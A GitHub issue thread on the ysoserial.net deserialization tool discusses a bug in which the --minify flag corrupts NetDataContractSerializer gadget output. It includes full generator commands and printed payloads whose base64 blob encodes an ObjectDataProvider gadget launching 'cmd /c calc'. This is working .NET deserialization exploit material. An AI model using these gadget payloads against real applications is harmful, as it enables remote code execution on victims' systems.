Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bug Report: Regex in DataContractSerializer_Marshal_2_MainType Function #158

Open
NtAlexio2 opened this issue Nov 30, 2023 · 3 comments
Open

Bug Report: Regex in DataContractSerializer_Marshal_2_MainType Function #158

NtAlexio2 opened this issue Nov 30, 2023 · 3 comments

Comments

@NtAlexio2
Copy link

The function DataContractSerializer_Marshal_2_MainType within the SerializersHelper.cs file, accessible here, contains a bug resulting in invalid data serialization for specific gadgets utilizing the NetDataContractSerializer formatter. The affected gadgets include:

  1. RolePrincipal
  2. AxHostState
  3. TextFormattingRunProperties

When these gadgets are utilized with the NetDataContractSerializer formatter, they produce invalid serialized objects.

Resolution:
A fast workaround for this issue involves commenting out the NetDataContractSerializer_Marshal_2_MainType reference in each affected gadget and using the serialized object directly. For instance, in the first case, the line:

string payload = SerializersHelper.NetDataContractSerializer_Marshal_2_MainType(utfString);

with

string payload = utfString;

Thank you for maintaining this exceptional project. Your efforts are greatly appreciated!
@irsdl
Copy link
Collaborator

irsdl commented Nov 30, 2023

Using the utfString without cleaning it will produce wrong data especially when we are creating it from an irrelevant class. Could you please provide me with an example of wrong data being produced?

If run ysoserial.exe -g TextFormattingRunProperties -f NetDataContractSerializer -c calc -t it works straight away.

@NtAlexio2
Copy link
Author

NtAlexio2 commented Dec 1, 2023
edited

Sure, For example executing:

ysoserial.exe --minify -g AxHostState -f NetDataContractSerializer -c calc -t

command, produces this broken output which not works (even with -t on localhost):

<AxHost.State  c:Type="System.WindoAxHost.States.Forms.AxHost+State" c:Assembly="System.WindoAxHost.States.Forms,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089"
	xmlns:c="http://schemas.microsoft.com/2003/10/Serialization/"
	xmlns="http://schemas.datacontract.org/2004/07/System.WindoAxHost.States.Forms">
	<PropertyBagBinary c:Type="System.Byte[]" c:Assembly="0"
		xmlns="">AAEAAAD/////AQAAAAAAAAAMAgAAABtNaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD6AjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIHhtbG5zPSJodHRAxHost.StateOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIAxHost.StateMDYveGFtbC9AxHost.StatecmVzZW50YXRpb24iIHhtbG5zOmE9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSI+PE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT48YTpQcm9jZXNzPjxhOlByb2Nlc3MuU3RhcnRJbmZvPjxhOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBjYWxjIiBGaWxlTmFtZT0iY21kIi8+PC9hOlByb2Nlc3MuU3RhcnRJbmZvPjAxHost.StatevYTpQcm9jZXNzPjAxHost.StatevT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPjAxHost.StatevT2JqZWN0RGF0YVByb3ZpZGVyPgs=
	</PropertyBagBinary>
</AxHost.State>

As you can see, the original System.Windows.Forms.AxHost+State part turned to invalid text System.WindoAxHost.States.Forms.AxHost+State. Because of internal regex in DataContractSerializer_Marshal_2_MainType function replaced all w characters with AxHost.State.

The original content stored in the utfString variable was:

<w c:FactoryType="d:AxHost.State" c:Type="System.Windows.Forms.AxHost+State" c:Assembly="System.Windows.Forms,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089"
	xmlns="http://schemas.datacontract.org/2004/07/ysoserial.Generators"
	xmlns:c="http://schemas.microsoft.com/2003/10/Serialization/"
	xmlns:d="http://schemas.datacontract.org/2004/07/System.Windows.Forms">
	<PropertyBagBinary c:Type="System.Byte[]" c:Assembly="0"
		xmlns="">AAEAAAD/////AQAAAAAAAAAMAgAAABtNaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD6AjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOmE9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSI+PE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT48YTpQcm9jZXNzPjxhOlByb2Nlc3MuU3RhcnRJbmZvPjxhOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBjYWxjIiBGaWxlTmFtZT0iY21kIi8+PC9hOlByb2Nlc3MuU3RhcnRJbmZvPjwvYTpQcm9jZXNzPjwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPjwvT2JqZWN0RGF0YVByb3ZpZGVyPgs=
	</PropertyBagBinary>
</w>

I haven't confirmed, it's possible that the issue lies with the --minify flag. Because @irsdl your example seems to work correctly.

@irsdl
Copy link
Collaborator

irsdl commented Dec 1, 2023

Thanks for more information, it seems the --minify argument indeed breaks NetDataContractSerializer. Here is another broken one:

ysoserial.exe -g TextFormattingRunProperties -f NetDataContractSerializer -c calc -t --minify

This happens when we have no test unit! Whoever has implemented the --minify flag is at fault here (point at myself)!
I will have a look soon to see how I can resolve this. For now, I recommend using generic XML minifiers instead of the one implemented by me in this project.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@irsdl @NtAlexio2